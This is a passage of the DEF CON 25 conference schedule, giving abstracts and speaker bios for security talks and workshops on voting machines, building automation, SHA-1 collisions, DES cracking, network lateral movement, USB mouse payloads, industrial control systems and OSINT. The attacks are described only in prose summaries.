El Kentaro has been a communications facilitator between Japan and the rest of the world in the information technology industry since 1996. For the last 7 years Kentaro has solely focused on providing interpretation services for the infosec/cyber security industry in Japan. Kentaro also provided the Japanese subtitles for the DEF CON documentary released in 2015 and is a member of the CODE BLUE Security Conference held annually in Japan.


Return to Index      -     

 

VMHV - Roman 1, Promenade Level - Friday - 16:00-16:45


Title:
How did we get here: A history of voting technology, hanging chads, and the Help America Vote Act. This segment will feature a punch card machine and demo what can go wrong with it.

Title: How did we get here: A history of voting technology, hanging chads, and the Help America Vote Act. Ill bring a punch card machine and demo what can go wrong with it.

Matt Blaze bio
Matt Blaze, Cryptographer & Associate Professor of Computer & Information Science at University of Pennsylvania

Matt Blaze is a professor at the University of Pennsylvania, where he directs the Distributed Systems Lab and conducts research in security, privacy, surveillance, cryptography, scale, and the relationship between technology and public policy. His work has included the discovery of fundamental flaws in the Clipper chip and other surveillance systems, foundational work in network security, file encryption, trust management and two way radio security, and security evaluations of major electronic voting systems in used in the US.

Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Friday - 10:10-10:59


How Hackers Changed The Security Industry

Chris Wysopal, CTO and Co-Founder of Veracode

Before hackers got involved in cybersecurity the industry was focused on products and compliance. Security was security features: firewalls, authentication, encryption. Little thought was given to vulnerabilities that allowed the bypassing of those features. Hackers came along with the idea that you use offensive techniques to simulate how an attacker would discover vulnerabilities in a networks, a system, or an application. Offensive skills have been on the rise ever since and now the best way to secure something it to try and break it yourself before the attacker does. This history will be told from a member of the hacker group The L0pht who lived the arc from the underground, to consumer advocates, to speaking at the U.S. Senate, to forming a 200 employee security consultancy, to schooling Microsoft and changing how people build software. Attendees will learn why we need the kind of tools hackers build to secure our systems and why we need people who are taught to think like hackers, 'security champions', to be part of software development teams.

Chris Wysopal (Twitter: @WeldPond) Chris Wysopal is currently Veracode's CTO and co-founder. He is one of the original vulnerability researchers and an early member of L0pht Heavy Industries, which he joined in 1992. He is the author of netcat for Windows and one of the authors of L0phtCrack. He has testified on Capitol Hill in the US on the subjects of government computer security and how vulnerabilities are discovered in software. He published his first advisory in 1996 on parameter tampering in Lotus Domino and has been trying to help people not repeat this type of mistake for 15 years. He is also the author of "The Art of Software Security Testing" published by Addison-Wesley.


Return to Index      -     

 

ICS - Calibria - Friday - 15:30-15:59


Title: How to create dark buildings with light speed.

A number of talks in the last few years have addressed various topics in the generic area of industrial control system insecurity but only few have tapped into security of building automation systems, albeit its prevalence.

The usage of building automation, regardless if in private homes or corporate buildings, aims to optimize comfort, energy efficiency and physical access for its users. Is cyber security part of the equation? Unfortunately, not to the extent one might expect, cyber security is quite often found to be sacrificed either for comfort or efficiency.

The higher number of small and large-scale installations combination with easily exploitable vulnerabilities leads to a stronger exposure of building automation systems, which are often overlooked. Even worse, an adversary understanding the usage of regular building automation protocol functions for malicious purposes may not only create chaos within the breached building but can potentially even peak into internal networks over building protocols which are otherwise not reachable.

This talk describes prototypic attack scenarios through building automation systems one should consider, and how even without exploits, a number of protocol functions in common building automation protocols like BACnet/IP and KNXnet/IP can support a malicious adversary going for those scenarious.

For penetration testers who would like to explore this interesting field of industrial security research, we include a section on tooling. We will discuss noteworthy tools both from the security toolbox but also from the building automation toolbox for carrying out a number of attacks or their preparatory steps.

We will close out talk by discussing existing security measures proposed by the building automation industry as well as their adoption problems found in this field.


Bio: Thomas Brandstetter

Thomas Brandstetter is CEO and Co-Founder of Limes Security, a company specializing in industrial cyber security and secure software development, based in Austria. Besides his work as a CEO, he is an Associate Professor at the University of Applied Sciences St. Poelten, Austria, where he loves to teach his students classes like industrial cyber security, incident response, botnets and honeypots, and penetration testing. He gathered a decade of experience in the industry when he joined Siemens in order to establish the topic of cyber security in industrial products, 10 years ago. After spending years in pen-testing products, he became Program Manager of the "Hack-Proof-Products Program" that he had co-founded. He held this position until in 2010 when the Stuxnet malware hit. He was assigned the official incident manager role for this unique threat and still loves to look back on what he learned back then both technically and about organizations. Out of the remnants of the Stuxnet-activities, Thomas founded the Siemens ProductCERT, which is still one of the most effective industrial incident and vulnerability response teams worldwide today. He led the Siemens ProductCERT for another two years before he left for Limes Security and UAS St. Poelten. He is a CISSP, GICSP and holds a degree in IT security from the University of Applied Sciences Hagenberg, Austria and a masters degree in Business Administration from the Universities of Augsburg and Pittsburgh.




Return to Index      -     

 

RCV - Palermo room, Promenade level - Saturday - 14:50-15:15


How to obtain 100 Facebooks accounts per day through internet searches

Abstract

Back in 2016, it was very new the way how the Facebook mobile application implements content through ““Instant articles””. A user can view content from third parties directly in the Facebook platform without requiring to open the Browser, for instance. This content can also be shared, saved, opened in browser and so on.

In this talk, we will share how there Instant articles, and the way they were shared, lead us to the possibility to access Facebook accounts and how through internet searches this became a huge problem! We’ll discuss how we identify the issue and how it was tested, reported, fixed, rewarded and also we talk about a new vector attack for further research.

Speaker Profile

Guillermo (@bym0m0) is a Cyber Security Penetration Testing Consultant at Deloitte Mexico; he has worked for many Financial Institutions and Public sector for the last 5 years.

Yael (@zkvL7) is a Cyber Security Snr. Consultant at Deloitte Mexico and has been working as a Security Specialist in different organizations for the last 4 years. He is really into programming and his laziness has lead into writting some code to automatize certain things at work; nmap and nessus reports for instance https://github.com/zkvL7, and some other work not ready to see the light.


Return to Index      -     

 

SEV - Emperors BR II - Saturday - 18:25-19:15



Saturday July 29 6:25PM 50 mins
How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises)
Most people who work on the defensive side of computer security only see the landscape from that perspective! In this talk Jayson will show how an attacker views your website & employees, then uses them against you. We’ll start with how a successful spear phish is created. By using the information gathered from the companies own ‘about’ page as well as scouring social media sites for useful information to exploit employees. The majority of the talk will be covering successful counter-measures to help stave off or detect attacks. This discussion will draw on the speakers 15 years experience of working in the US banking industry on the side of defense. Also at the same time he’ll be drawing on over 6 years of doing engagements where he took on the role of the attacker. If everything turns out well everyone will have learned something new that they can immediately take back to their networks and better prepare it against attacks!

Jayson Street: @jaysonstreet
Jayson E. Street is an author of the “Dissecting the hack: Series”. Also the DEF CON Groups Global Coordinator. He has also spoken at DEF CON, DerbyCon, UCON and at several other ‘CONs and colleges on a variety of Information Security subjects. His life story can be found on Google under “Jayson E. Street” *He is a highly carbonated speaker who has partaken of Pizza from Beijing to Brazil. He does not expect anybody to still be reading this far but if they are please note he was chosen as one of Time’s persons of the year for 2006.


Return to Index      -     

 

BHV - Pisa Room - Sunday - 12:00-12:59


Title: How to use the Scientific Method in Security Research

Speaker: Jay Radcliffe

About Jay:
Jay Radcliffe has been working in the computer security field for over 20 years. Coming from the managed security services industry, Jay has used just about every security device made over the last decade. Recently, Jay presented ground-breaking research on security vulnerabilities in medical devices, and was featured on national television as an expert on medical device vulnerability. Jay also has experience with hardware hacking and radio technology. Jay holds a Master's degree in Information Security Engineering from SANS Technology Institute, as well as a Bachelor's degree in Criminal Justice/Pre-Law from Wayne State University. SC Magazine named him one of the Top Influential IT Security Thinkers in 2013.

One of the huge criticisms of Security research is the lack of process and adherence to traditional research methods. Quite often our "research" is just tearing apart systems and exposing their vulnerabilities. While this is useful, there is a better way. This talk will walk through the process of how I used the scientific method to conduct the research that led to my 2011 insulin pump findings. By changing just a couple steps in our research, I think that we can bring more outside credibility to our hard, and important work.



Return to Index      -     

 

DEFCON - Track 4 - Friday - 14:00-14:45


How we created the first SHA-1 collision and what it means for hash security

Friday at 14:00 in Track 4

45 minutes | Demo, Tool

Elie Bursztein Anti-abuse research lead, Google

In February 2017, we announced the first SHA-1 collision. This collision combined with a clever use of the PDF format allows attackers to forge PDF pairs that have identical SHA-1 hashes and yet display different content. This attack is the result of over two years of intense research. It took 6500 CPU years and 110 GPU years of computations which is still 100,000 times faster than a brute-force attack.

In this talk, we recount how we found the first SHA-1 collision. We delve into the challenges we faced from developing a meaningful payload, to scaling the computation to that massive scale, to solving unexpected cryptanalytic challenges that occurred during this endeavor.

We discuss the aftermath of the release including the positive changes it brought and its unforeseen consequences. For example it was discovered that SVN is vulnerable to SHA-1 collision attacks only after the WebKit SVN repository was brought down by the commit of a unit-test aimed at verifying that Webkit is immune to collision attacks.

Building on the Github and Gmail examples we explain how to use counter-cryptanalysis to mitigate the risk of a collision attacks against software that has yet to move away from SHA-1. Finally we look at the next generation of hash functions and what the future of hash security holds

Elie Bursztein
Elie Bursztein leads Google's anti-abuse research, which helps protect users against Internet threats. Elie has contributed to applied-cryptography, machine learning for security, malware understanding, and web security; authoring over fifty research papers in the field. Most recently he was involved in finding the first SHA-1 collision.

Elie is a beret aficionado, tweets at @elie, and performs magic tricks in his spare time. Born in Paris, he received a Ph.D from ENS-cachan in 2008 before working at Stanford University and ultimately joining Google in 2011. He now lives with his wife in Mountain View, California.

@elie


Return to Index      -     

 

BHV - Pisa Room - Sunday - 13:00-13:29


Title: How your doctor might be trying to kill you and how personal genomics can save your life

Speaker: dlaw and razzies

About Jennifer Szkatulski:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.

About Darren Lawless:
Darren Lawless is a security analyst with 14+ years of plugging dykes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple years resulting in forays, experimentation, and investigation into nootropics, biofeedback, and augmentation, implantation, brain stimulation, and a sundry wet-tech bad-assedness.

“Genomics saved my life.” – Jen
“My father can rot in hell.” - Darren

How is personalized medicine important? Should I get a genomic test? Is the Illuminati collecting my data? What can I learn from genetic testing? What are the risks? How do I choose a test? Will my doctor hate me if I get a genetic test?
These questions won’t be answered in thirty minutes, but we offer grist for the discussion mill.
We will present two personal stories on how genomics can have a real effect on your medical treatment, your understanding of who you are, and how you live your life.



Return to Index      -     

 

Demolabs - Table 2 - Saturday - 12:00-13:50


https://crack.sh/

David Hulton

Ian Foster

Saturday from 1200-1350 at Table Two

Audience: Offense, Mobile, Hardware

Cracking DES has been doable for state actors for the past few decades, but most people don't have access to a supercomputer or $100k of dedicated hardware laying around. In 2012, Moxie Marlinspike and David Hulton released a service for Cloudcracker.com to provide this to the masses for 100% success rate cracking of MSCHAPv2 (PPTP VPNs & WPA-Enterprise). Since then Cloudcracker.com has vanished, but ToorCon has taken over and released https://crack.sh, with added features for cracking MSCHAPv1 (Windows Lanman/NTLMv1 login), Kerberos Authentication, and a general purpose interface for cracking other systems that still use DES. We will also be releasing a free real-time service for cracking DES (in ~3 seconds) with chosen-plaintext, providing a full break of Windows Lanman/NTLMv1 authentication and allow people to test their devices to see if they're doing proper WPA-Enteprise certificate checking.

https://crack.sh/

David Hulton
David Hulton organizes the ToorCon suite of conferences and has spent nearly 20 years doing security research mostly focused on reverse engineering and cracking crypto. He's mostly known for developing the bsd-airtools wireless attack tools in the early 2000's, developing and presenting the first practical attack on GSM a5/1 in 2008, and releasing a DES cracking service and tools to perform a full break of MSCHAPv2 authentication in 2012.

Ian Foster


Return to Index      -     

 

Night Life - Octavius 1&2 - Saturday - 22:00-26:00


Title:
Human Zoo

Spent the first part of the night in the room next door enjoying Whose Slide is it Anyway? Well, this is the after party for folks that want to keep the insanity going. Join us, and come be part of the Human Zoo!
Return to Index      -     

 

BHV - Pisa Room - Friday - 17:30-17:59


Title: Human-Human Interface

Speakers: Charles Tritt

About Charles:
Dr. Charles Tritt is a has been a professor of biomedical engineering for over 25 years. His academic credentials include a Ph.D. in chemical engineering and an M.S. in biomedical engineering. His teaching has ranged from introductory cell biology and genetics to biomedical mechatronics. Over the past several years, he has become interested in exploring the potential of hobbyist grade equipment as a vehicle to low cost and accessible medical devices and the corresponding ethical and legal implications.

Abstract:
In this demonstration, readily available and inexpensive (about $100 total cost) equipment will be used to relay conscious motor activity from one human subject to another. Specifically, transcutaneous electrodes and a bio-amplifier will be used to produce an electromyogram (EMG) signal from the lower arm of the controlling subject. This signal will be digitized and processed using an embedded microcontroller evaluation board (an Arduino UNO could also be used) which in turn will activate a relay to apply transcutaneous electrical nerve stimulation to the ulnar nerve of the controlled subject. Motions of the controlled subject’s fingers will involuntarily replicate those of the controlling subject.



Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Sunday - 10:00-10:59


Title:
HUMSEC (or how I learned to hate my phone)

1000 Sunday
amarok
@0x00amarok
HUMSEC (or how I learned to hate my phone)

I used to blog random security stuff, but now am talking directly to people at InfoSec cons instead. So like a crappy Richard Thieme talk, but maybe with a bit more tech and a few less aliens (but maybe some f*cking aliens). This time around, we're talking "Human Security" (no idea, srsly)

Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 17:10-17:30


Hunting Down the Domain Admin and Rob Your Network

Keith Lee, Senior Security Consultant at Trustwave SpiderLabs
Michael Gianarakis, Director of Trustwave SpiderLabs Asia-Pacific

Portia: it's a new tool we have written at SpiderLabs to aid in internal penetration testing test engagements. The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources as well as an IP ranges, subnet or list of IP addresses. The tool finds its way around the network and attempts to gain access into the hosts, finds and dumps the passwords/hashes, reuses them to compromise other hosts in the network. In short, the tool helps with lateral movements in the network and automating privilege escalation as well as find sensitive data residing in the hosts.

Keith Lee (Twitter: @keith55) is a Senior Security Consultant with Trustwave's SpidersLabs Asia-Pacific. SpiderLabs is one of the world's largest specialist security teams, with over 100 consultants spread across North America, South America, Europe and the Asia Pacific. Keith Lee has presented in Hack In The Box, BlackHat Arsenal and PHDays.

Michael Gianarakis is the Director of Trustwave SpiderLabs' Asia-Pacific practice where he oversees the delivery of technical security services in the region. Michael has presented at various industry events and meetups including, Black Hat Asia, Thotcon, Rootcon, and Hack in the Box. Michael is also actively involved in the local security community in Australia where he is one of organizers of the monthly SecTalks meetup.


Return to Index      -     

 

DEFCON - Track 2 - Sunday - 10:00-10:30


I Know What You Are by the Smell of Your Wifi

Sunday at 10:00 in Track 2

20 minutes | Art of Defense, Demo, Tool, Audience Participation,

Denton Gentry Software Engineer

Existing fingerprinting mechanisms to identify client devices on a network tend to be coarse in their identification. For example they can tell it is an iPhone of some kind, or that it is a Samsung Android device of some model. They might look at DHCP information to know its OS, see if the client responds to SSDP, or check DNS-SD TXT responses.

By examining Wi-Fi Management frames we can identify the device much more specifically. We can tell a iPhone 5S from an iPhone 5, a Samsung Galaxy S8 from an S7, an LG G5 from a G4. This talk describes how the signature mechanism works.

Specifically identifying the client is the first step toward further scanning or analysis of that client's behavior on the network.

Denton Gentry
Denton Gentry is a software engineer who has worked at a lot of places and plans to work at a few more.


Return to Index      -     

 

ICS - ICS-Village - Saturday - 14:30-15:59


ICS SCADA Forensics workshop/challenge - Joe Stirlandand Kevin Jones
Title: ICS SCADA Forensics workshop/challenge

The ICS PCAP challenge is designed to utilise network forensics skills to analyse a baseline and an attack network pcap taken from an ICS network, in order to identify why a PLC has ceased working. The timescale for analysis is limited, as we need to replace the PLC within an hour max, and we have to be certain that the attack has been identified correctly in order to prevent future similar attack methods. The analysis will take 1 hour and a brief description of findings and conclusion is to be presented at the end. The participants will require network analysis tools such as: Wireshark, TCPDump and TShark, GREP, etc. however a copy of Kali will provide all of these tools.


Bio: Joe Stirlandand Kevin Jones

No BIO available


Return to Index      -     

 

DEFCON - Track 3 - Saturday - 11:00-11:45


If You Give a Mouse a Microchip... It will execute a payload and cheat at your high-stakes video game tournament

Saturday at 11:00 in Track 3

45 minutes | Demo

skud (Mark Williams) Embedded Software Engineer

Sky (Rob Stanley) Security Software Engineer, Lead

The International, a recent esports tournament, had a 20 million dollar prize pool with over five million people tuned in to the final match. The high stakes environment at tournaments creates an incentive for players to cheat for a competitive advantage. Cheaters are always finding new ways to modify software, from attempting to sneak executables in on flash drives, to using cheats stored in Steam's online workshop which bypasses IP restrictions.

This presentation describes how one can circumvent existing security controls to sneak a payload (game cheat) onto a target computer. Esports tournaments typically allow players to provide their own mouse and keyboard, as these players prefer to use specific devices or may be obligated to use a sponsor branded device. These "simple" USB input devices can still be used to execute complex commands on a computer via the USB Human Interface Device (HID) protocol.

Our attack vector is a mouse with an ARM Cortex M series processor. The microcontroller stores custom user profiles in flash memory, allowing the mouse to retain user settings between multiple computers. We modify the device's firmware to execute a payload delivery program, stored in free space in flash memory, before returning the mouse to its original functionality. Retaining original functionality allows the mouse to be used discreetly, as it is an "expected" device at these tournaments. This concept applies to any USB device that uses this processor, and does not require obvious physical modifications.

This delivery method has tradeoffs. Our exploit is observable, as windows are created and in focus during payload delivery. The advantage to this approach is that it bypasses other security measures that are commonly in place, such as filtered internet traffic and disabled USB mass storage.

skud (Mark Williams)
Mark Williams is an embedded software engineer with experience in robotics and computer vision. His interest in embedded systems security and research builds off of a love for DIY projects, microcontrollers, and breaking things.

@skudmunky

Sky (Rob Stanley)
Rob Stanley is a lead security software engineer with a background in reverse engineering. He enjoys working with low-level software, taking things apart and putting them back together, and malware analysis. Lately, he has turned his passion towards sharing his knowledge by teaching, and authoring CTF challenge problems.


Return to Index      -     

 

IOT - Main Contest Area - Saturday - 14:40-15:30



Return to Index      -     

 

BHV - Pisa Room - Friday - 13:30-13:59


Title: Implants: Show and Tell

Speaker: c00p3r

About c00p3r:
c00p3r is the founder of dangerousminds.io a biohacking. grinding, implantable tech, and network security podcast that started in late sept 2016 , a sysadmin that lives open source solutions by trade, and also pr director and member of the board of directors for prophase biostudios located in austin texas.

Abstract:
Through sharing experiences learned first hand and through work on the Dangerous Minds Podcast, c00p3r will be introducing you to implantable technology, explaining the basic products that are available on the market now, from where, as well as provide a show and tell experience of what it is like to become one of the augmentives. Come to learn, and stay to laugh and become a part of this new world of cyborgs.



Return to Index      -     

 

ICS - Octavius 6 - Friday - 14:30-18:30


Title: Industrial Control System Security 101 and 201- SOLD OUT

This 4-hour session is designed to arm incident response teams and security researchers with vital skills needed to monitor, analyze and respond to attacks against the unique networks that make up the backbone of the world's critical infrastructure. With recent attacks on critical infrastructure demonstrating the real and present danger to ICS networks, it is more important than ever to hone these skills and reduce the blind spots that exist for security teams. Understanding the inner workings of these networks, their unique protocols and the methods adversaries will employ to disrupt (including using legitimate commands to ICS network components) is of paramount importance as we witness an increasingly active threat landscape unfolding.

The workshop is composed of two, 2-hour sessions of ICS Fundamentals 101 and ICS Advanced 201. The two sessions step both the novice and intermediate skilled participant through the risks and mitigations of critical infrastructure and control system security.

The participant will use open source and trial editions of RexDraw, PeakHMI, NRL Core, Kali Linux, Python and Raspberry PIs.

The instructors will also perform demonstrations using real industrial devices. Participants will learn the ICS fundamentals and the value of technical, operational and physical security controls within ICS environments.

ICS 101 will guide the participants through the elements of ICS technical components (hardware, software, logic and protocols) through reversing engineering a bottling facility and a traffic light. The participants will learn about physical I/O, functional logic, industrial protocols and user interface design using the philosophy of build, break and secure. The participants will reverse a pre-built HMI user interface, OPC tag server and functional logic; break using industrial protocols overrides, MitM modifications and logic manipulations; secure using social, communication, application/os, firmware and hardware controls.

ICS 201 will teach students how to understand the content of network packet captures across a wide variety of proprietary ICS protocols. Using this understanding, we will explore in-depth the attacks and defenses demonstrated in ICS 101 to associate the value of active defense.

Participants will learn how to utilize WireShark to perform a deep packet analysis on multiple PCAPs ranging from simple to complex. Students will be taught the fundamental skills necessary for performing blind protocol analysis on proprietary ICS protocols, and learn how to create custom rules for specific addresses within the packets as well as ICS vendor specific commands. This analysis will give insight into the attacks performed, the elements manipulated and valuable tools available to actively defend the environment. Participants will gain in-depth understanding of industrial protocols and their complexity as well as detailed explanation of "behind the scenes" of ICS operations. When leaving this workshop, participants will be able to capture, and analyse industrial communication flows originating from different network segments using open source tooling (e.g. Snort, Wireshark, etc), and how to identify potential anomalous network traffic.

Prerequisites: Experience with Linux and Windows operating system administration. Experience with TCP/IP networking. Experience with Kali Linux.

Materials: A laptop with at least one USB port, 40GB of unused hard disk space, minimum of Intel i3 processor, most recent VMWare Player or equivalent VMWare product. Local administrator rights on the laptop, ability to turn off anti-virus software.


Bio: Matthew E. Luallen

Matthew Luallen is the Executive Inventor at CYBATI, a cybersecurity education company. Mr. Luallen has provided hands-on cybersecurity consulting and education within critical infrastructure for over 20 years. During this time he has owned and sold 3 companies, developed and educated upon cybersecurity products and technical assessment methodologies, maintained CISSP and CCIE status for 16 years. Mr. Luallen's passion is education and to expand knowledge through building, breaking, securing and making.


Bio: Nadav Erez

Nadav Erez is a Senior Researcher at Claroty's Research team, leading OT protocol analysis, reverse engineering and blind protocol reconstruction. Prior to joining Claroty, Nadav served in an elite cyber unit in the Israel Defense Forces (IDF) Intelligence corps, where he led a team of cybersecurity researchers in various operations.

Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 6 - Friday - 14:30-18:30


Industrial Control System Security 101 and 201

Friday, 14:30 to 18:30 in Octavius 6

Matthew E. Luallen Executive Inventor, CYBATI

Nadav Erez Senior Researcher, Claroty's Research team

This 4-hour session is designed to arm incident response teams and security researchers with vital skills needed to monitor, analyze and respond to attacks against the unique networks that make up the backbone of the world's critical infrastructure. With recent attacks on critical infrastructure demonstrating the real and present danger to ICS networks, it is more important than ever to hone these skills and reduce the blind spots that exist for security teams. Understanding the inner workings of these networks, their unique protocols and the methods adversaries will employ to disrupt (including using legitimate commands to ICS network components) is of paramount importance as we witness an increasingly active threat landscape unfolding.

The workshop is composed of two, 2-hour sessions of ICS Fundamentals 101 and ICS Advanced 201. The two sessions step both the novice and intermediate skilled participant through the risks and mitigations of critical infrastructure and control system security.

The participant will use open source and trial editions of RexDraw, PeakHMI, NRL Core, Kali Linux, Python and Raspberry PIs.

The instructors will also perform demonstrations using real industrial devices. Participants will learn the ICS fundamentals and the value of technical, operational and physical security controls within ICS environments.

ICS 101 will guide the participants through the elements of ICS technical components (hardware, software, logic and protocols) through reversing engineering a bottling facility and a traffic light. The participants will learn about physical I/O, functional logic, industrial protocols and user interface design using the philosophy of build, break and secure. The participants will reverse a pre-built HMI user interface, OPC tag server and functional logic; break using industrial protocols overrides, MitM modifications and logic manipulations; secure using social, communication, application/os, firmware and hardware controls.

ICS 201 will teach students how to understand the content of network packet captures across a wide variety of proprietary ICS protocols. Using this understanding, we will explore in-depth the attacks and defenses demonstrated in ICS 101 to associate the value of active defense.

Participants will learn how to utilize WireShark to perform a deep packet analysis on multiple PCAPs ranging from simple to complex. Students will be taught the fundamental skills necessary for performing blind protocol analysis on proprietary ICS protocols, and learn how to create custom rules for specific addresses within the packets as well as ICS vendor specific commands. This analysis will give insight into the attacks performed, the elements manipulated and valuable tools available to actively defend the environment. Participants will gain in-depth understanding of industrial protocols and their complexity as well as detailed explanation of "behind the scenes" of ICS operations. When leaving this workshop, participants will be able to capture, and analyse industrial communication flows originating from different network segments using open source tooling (e.g. Snort, Wireshark, etc), and how to identify potential anomalous network traffic.

Prerequisites: Experience with Linux and Windows operating system administration. Experience with TCP/IP networking. Experience with Kali Linux.

Materials: A laptop with at least one USB port, 40GB of unused hard disk space, minimum of Intel i3 processor, most recent VMWare Player or equivalent VMWare product. Local administrator rights on the laptop, ability to turn off anti-virus software.

Max students: 36 | Registration: https://dc25_luallen.eventbrite.com (Sold out!)

Matthew E. Luallen
Matthew Luallen is the Executive Inventor at CYBATI, a cybersecurity education company. Mr. Luallen has provided hands-on cybersecurity consulting and education within critical infrastructure for over 20 years. During this time he has owned and sold 3 companies, developed and educated upon cybersecurity products and technical assessment methodologies, maintained CISSP and CCIE status for 16 years. Mr. Luallen's passion is education and to expand knowledge through building, breaking, securing and making.

Nadav Erez
Nadav Erez is a Senior Researcher at Claroty's Research team, leading OT protocol analysis, reverse engineering and blind protocol reconstruction. Prior to joining Claroty, Nadav served in an elite cyber unit in the Israel Defense Forces (IDF) Intelligence corps, where he led a team of cybersecurity researchers in various operations.


Return to Index      -     

 

Night Life - Turin, Promenade Level - Friday - 22:00-27:00


Title:
INFOSEC UNLOCKED

INFOSEC UNLOCKED will be hosting a safe and fun board game party for DEF CON attendees. We will provide the space, light refreshments and network opportunities --all we need is you! Come learn about what it takes to become a conference speaker; no experience required and ALL are welcome! More details at https://isunlocked.com/dc25party !! InfoSec Unlocked is all about diversity and inclusion in Information Security. If you're part of an underrepresented group, or want to help out those who are underrepresented within our field. Join us for good times, and good discussions, at InfoSec Unlocked.
Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Saturday - 13:00-13:59


Insecure By Law

No description available


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 15:00-15:45


Inside the "Meet Desai" Attack: Defending Distributed Targets from Distributed Attacks

Thursday at 15:00 in 101 Track

45 minutes | Art of Defense

CINCVolFLT (Trey Forgety) Director of Government Affairs & IT Ninja, NENA: The 9-1-1 Association

In October of 2016, a teenage hacker triggered DTDoS attacks against 9-1-1 centers across the United States with five lines of code and a tweet. This talk provides an in-depth look at the attack, and reviews and critiques the latest academic works on TDoS attacks directed at 9-1-1 systems. It then discusses potential mitigation strategies for legacy TDM and future all-IP access networks, as well as disaggregated "over-the-top" originating services and the devices on which both the access network providers and originating service providers rely.

CINCVolFLT (Trey Forgety)
CINCVolFLT (Trey Forgety) is Director of Government Affairs for NENA: The 9-1-1 Association. He previously served as a Presidential Management Fellow in the U.S. Department of Homeland Security's Office of Emergency Communications, with rotations in the Federal Communications Commission's Public Safety and Homeland Security Bureau, and the U.S. Department of Commerce's National Telecommunications and Information Administration. A sometimes-piratical sailor and inveterate tinkerer, CINCVolFLT's recent activities have included promoting the use of new location technologies in wireless carriers' networks, and serving as pro bono counsel to QueerCon. He holds a B.S. in Applied Physics and a J.D., both from the University of Tennessee (GO VOLS!).

@cincvolflt


Return to Index      -     

 

IOT - Main Contest Area - Friday - 10:00-10:50



Return to Index      -     

 

IOT - Main Contest Area - Sunday - 10:00-10:50



Return to Index      -     

 

RCV - Palermo room, Promenade level - Friday - 15:40-16:25


Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool

Abstract

With 313 million active users and approximately 500 million Tweets sent per day, Twitter has plenty of low-hanging fruit ripe for OSINT picking. Learn from an experienced information professional how to craft advanced searches to retrieve data from this popular social media platform. Understand the search commands that Twitter uses, tips and techniques for extracting data, examine some of the lesser-known features of Twitter, and get a glimpse of some of the resources that work in conjunction with Twitter to help you better organize all the information you will retrieve.

While you may know how to write scripts and scrape data from Twitter, this session will focus on the GUI which can retrieve much older data. This session is not how to Tweet better, get more likes, or even how to get verified. This is all about searching for and extracting information from Twitter and its associated sites. You will come away from this session with a better understanding of how to use Twitter as a research tool.

Speaker Profile

Tracy Z. Maleeff (@InfoSecSherpa) left behind the glamorous world of law firm librarianship to seek out the white-hot spotlight of the information security industry. She is a newly-minted Cyber Analyst at GSK (GlaxoSmithKline.) Before that, Tracy started an independent research consulting business in 2016 called Sherpa Intelligence, and provided competitive intelligence, news monitoring, and social media management services. She earned a Master of Library and Information Science degree from the University of Pittsburgh.

Tracy was recognized with the Wolters Kluwer Law & Business Innovations in Law Librarianship Award in 2016 and the Dow Jones Innovate Award in 2014. Tracy is your guide up a mountain of information! Her Digital Portfolio can be viewed online here: https://sherpaintel.wordpress.com/portfolio/


Return to Index      -     

 

RCV - Palermo room, Promenade level - Saturday - 16:00-17:59


Intro to OSINT: Zero on the way to Hero

Abstract

OSINT can be ones worst enemy or best friend, depending on what angle the person is looking at it from. This introduction level workshop will start out discussing the basis of OSINT then transition into applicable use case scenarios. Once we have a sound foundation in OSINT, we’ll start to work on some collection considerations and techniques.

In terms of tools used in this presentation, the list is somewhat fluid based upon the advancement of other tools, social media platforms, or other variables. Tools intended to be highlighted are: OSINTFramework.com, Inteltechniques.com, Buscador Linux, Recon-ng, Datasploit, APIs (Twitter and possibly Facebook; maybe others), haveibeenpwned. Cree.py, whois, persona generator, and others.

Depending on your position, this talk with either arm you with the right tools to build better OSINT engagements, whether for phishing or other investigations or educate you on steps you can take to better secure yourself.

Detailed talk outline : Hour 1

Speaker Profile

Joe Gray (@C_3PJoe) joined the U.S. Navy directly out of High School and served for 7 years as a Submarine Navigation Electronics Technician. Joe is an Enterprise Security Consultant at Sword & Shield Enterprise Security in Knoxville, TN. Joe also maintains his own Blog and Podcast called Advanced Persistent Security. In his spare time, Joe enjoys reading news relevant to information security, attending information security conferences, contributing blogs to various outlets, bass fishing, and flying his drone. He is currently progressing his DFIR skills through Data Carving and Malware Analysis and Reverse Engineering.

I have spoken/presented at the following (All 2017):, BSides Hunstville (Last minute alternate), (ISC)² Atlanta, BSides Indy, (ISC)² Middle TN, Infosec Southwest , BSides Nashville, BSides Charm (Baltimore), BSides Knoxville, BSides Cincy, Dc865 (Knoxville TN Defcon chapter).

Here are some links to my talks:


Return to Index      -     

 

DEFCON - Track 3 - Saturday - 17:00-17:45


Introducing HUNT: Data Driven Web Hacking & Manual Testing

Saturday at 17:00 in Track 3

45 minutes | Demo, Tool

Jason Haddix Head of Trust and Security @ Bugcrowd

What if you could super-charge your web hacking? Not through pure automation (since it can miss so much) but through powerful alerts created from real threat intelligence? What if you had a Burp plugin that did this for you? What if that plugin not only told you where to look for vulns but also gave you curated resources for additional exploitation and methodology? What if you could organize your web hacking methodology inside of your tools? Well, now you do! HUNT is a new Burp Suite extension that aims to arm web hackers with parameter level suggestions on where to look for certain classes of vulnerabilities (SQLi, CMDi, LFI/RFI, and more!). This data is parsed from hundreds of real-world assessments, providing the user with the means to effectively root out critical issues. Not only will HUNT help you assess large targets more thoroughly but it also aims to organize common web hacking methodologies right inside of Burp suite. As an open source project, we will go over the data driven design of HUNT and it's core functionality.

Jason Haddix
